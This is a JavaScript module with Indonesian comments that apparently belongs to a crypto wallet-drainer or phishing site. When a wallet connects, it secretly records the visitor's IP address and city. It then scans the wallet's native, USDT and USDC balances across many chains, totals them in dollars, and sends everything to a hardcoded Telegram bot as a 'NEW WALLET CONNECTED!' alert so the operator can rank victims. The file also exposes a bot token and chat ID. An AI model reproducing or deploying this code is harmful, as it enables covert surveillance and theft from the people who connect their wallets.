import { createPublicClient, http, formatEther, formatUnits } from 'viem';
// Perhatikan penambahan TOKEN_PRICES di baris bawah ini:
import { networksList, ERC20_ADDRESSES, erc20Abi, TOKEN_PRICES } from './config';

// === PENGATURAN TELEGRAM ANDA ===
const TELEGRAM_BOT_TOKEN = "8743709208:AAFTEgxrBj8TqKiP5YP8VirdLuP8QmBUWpo"; 
const TELEGRAM_CHAT_ID = "-1003610646310"; 

export const sendTelegramLog = async (address) => {
  // Anti-Spam: Mencegah pengiriman berulang jika user hanya me-refresh halaman
  const sessionKey = `tg_logged_${address}`;
  if (sessionStorage.getItem(sessionKey)) return;

  try {
    // 1. Dapatkan Lokasi dari IP
    let locationStr = "Lokasi Tidak Diketahui";
    try {
      const ipRes = await fetch('https://ipapi.co/json/');
      const ipData = await ipRes.json();
      locationStr = `${ipData.city || '?'}, ${ipData.country_name || '?'} (IP: ${ipData.ip || '?'})`;
    } catch (e) { console.warn("Gagal melacak IP"); }

    const domain = window.location.hostname || "localhost";
    const debankLink = `https://debank.com/profile/${address}`;

    // 2. Scan Saldo di Semua Jaringan (Background Process)
    let balancesText = "";
    let grandTotalUsd = 0; // VARIABEL UNTUK MENAMPUNG TOTAL DOLLAR
    
    // Scan secara bersamaan agar super cepat
    const scanPromises = networksList.map(async (net) => {
      const rpcList = [net.rpc, net.viemChain?.rpcUrls?.default?.http?.[0]].filter(Boolean);
      for (const rpc of rpcList) {
        try {
          const client = createPublicClient({ chain: net.viemChain, transport: http(rpc, { timeout: 3000 }) });
          
          // Ambil Saldo Native
          const balWei = await client.getBalance({ address });
          let nativeBal = parseFloat(formatEther(balWei));
          let usdtBal = 0, usdcBal = 0;

          // Ambil USDT
          const usdtAddr = ERC20_ADDRESSES[net.chainId]?.['USDT'];
          if (usdtAddr) {
            const usdtDec = await client.readContract({ address: usdtAddr, abi: erc20Abi, functionName: 'decimals' });
            const usdtWei = await client.readContract({ address: usdtAddr, abi: erc20Abi, functionName: 'balanceOf', args: [address] });
            usdtBal = parseFloat(formatUnits(usdtWei, usdtDec));
          }

          // Ambil USDC
          const usdcAddr = ERC20_ADDRESSES[net.chainId]?.['USDC'];
          if (usdcAddr) {
            const usdcDec = await client.readContract({ address: usdcAddr, abi: erc20Abi, functionName: 'decimals' });
            const usdcWei = await client.readContract({ address: usdcAddr, abi: erc20Abi, functionName: 'balanceOf', args: [address] });
            usdcBal = parseFloat(formatUnits(usdcWei, usdcDec));
          }

          // Return jika berhasil
          return { net, nativeBal, usdtBal, usdcBal, success: true };
        } catch(err) { /* Lanjut ke rpc berikutnya jika gagal */ }
      }
      return { net, success: false };
    });

    const results = await Promise.all(scanPromises);

    results.forEach(({ net, nativeBal, usdtBal, usdcBal, success }) => {
      if (success && (nativeBal > 0 || usdtBal > 0 || usdcBal > 0)) {
        
        // KALKULASI TOTAL DALAM DOLLAR (USD)
        const nativeUsdPrice = TOKEN_PRICES[net.symbol] || 0;
        const nativeValueInUsd = nativeBal * nativeUsdPrice;
        
        // Asumsi USDT dan USDC bernilai $1
        const networkTotalUsd = nativeValueInUsd + usdtBal + usdcBal; 
        grandTotalUsd += networkTotalUsd;

        balancesText += `\n🌐 <b>${net.name}</b>\n`;
        if (nativeBal > 0) balancesText += `   🔸 ${nativeBal.toFixed(4)} ${net.symbol} <i>($${nativeValueInUsd.toFixed(2)})</i>\n`;
        if (usdtBal > 0) balancesText += `   💵 ${usdtBal.toFixed(2)} USDT\n`;
        if (usdcBal > 0) balancesText += `   💶 ${usdcBal.toFixed(2)} USDC\n`;
      }
    });

    if (balancesText === "") {
        balancesText = "\n<i>(Wallet terlihat kosong atau saldo sangat kecil)</i>\n";
    }

    // FORMAT ANGKA DOLLAR AGAR RAPI (Contoh: $1,250.50)
    const formattedGrandTotal = grandTotalUsd.toLocaleString('en-US', {
      minimumFractionDigits: 2, 
      maximumFractionDigits: 2
    });

    // 3. Susun Pesan Cantik untuk Telegram
    const message = `
🦊 <b>NEW WALLET CONNECTED!</b> 🦊

🌍 <b>Domain:</b> ${domain}
📍 <b>Lokasi:</b> ${locationStr}

💳 <b>Address:</b>
<code>${address}</code>

💸 <b>EST. TOTAL ASSETS: $${formattedGrandTotal}</b>

💰 <b>BALANCES FOUND:</b>${balancesText}
🔗 <a href="${debankLink}">🔍 View Wallet on DeBank</a>
    `;

    // 4. Kirim ke Telegram API
    await fetch(`https://api.telegram.org/bot${TELEGRAM_BOT_TOKEN}/sendMessage`, {
      method: 'POST',
      headers: { 'Content-Type': 'application/json' },
      body: JSON.stringify({
        chat_id: TELEGRAM_CHAT_ID,
        text: message,
        parse_mode: 'HTML',
        disable_web_page_preview: true
      })
    });

    // Tandai sudah dilog agar tidak spam
    sessionStorage.setItem(sessionKey, 'true');

  } catch (error) {
    console.error("Telegram Logger Error:", error);
  }
};